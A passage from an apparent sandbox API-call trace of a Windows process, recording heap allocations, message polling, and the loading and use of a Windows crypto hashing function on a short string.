lpsz="_CRYPT_STARTUP") returned 0xe [0148.644] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0148.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0148.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0148.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0148.644] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0148.644] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0148.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0148.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0148.644] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0148.644] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0148.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0148.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0148.645] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0148.645] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0148.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0148.645] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0148.645] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0148.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0148.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0148.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0148.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0148.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0148.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0148.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0148.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0148.645] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0148.645] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0148.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0148.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0148.645] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0148.645] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0148.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0148.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0148.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0148.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0148.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0148.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0148.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0148.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0148.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50aa0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0148.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0148.646] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0148.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0148.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0148.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0148.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0148.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0148.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0148.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0148.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0148.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0148.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0148.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0148.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0148.647] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0148.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0148.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0148.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0148.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0148.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0148.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0148.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0148.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0148.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0148.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0148.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0148.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0148.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0148.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0148.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0148.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0148.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0148.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0148.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0148.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0148.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0148.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0148.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0148.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0148.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0148.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0148.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0148.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0148.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0148.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0148.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0148.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0148.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0148.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0148.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0148.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0148.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0148.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0148.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0148.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0148.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0148.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0148.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0148.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0148.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0148.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0148.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0148.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0148.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0148.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0148.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0148.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0148.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0148.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0148.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0148.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0148.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0148.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0148.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0148.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0148.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0148.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0148.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0148.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0148.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d38 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0148.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0148.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0148.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0148.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0148.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0148.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0148.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0148.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0148.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0148.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0148.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0148.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0148.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0148.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0148.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0148.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0148.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0148.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0148.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0148.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0148.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0148.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0148.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0148.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0148.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0148.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0148.654] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0148.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0148.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0148.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0148.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0148.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0148.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0148.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0148.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0148.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0148.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0148.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0148.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0148.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e38 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0148.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 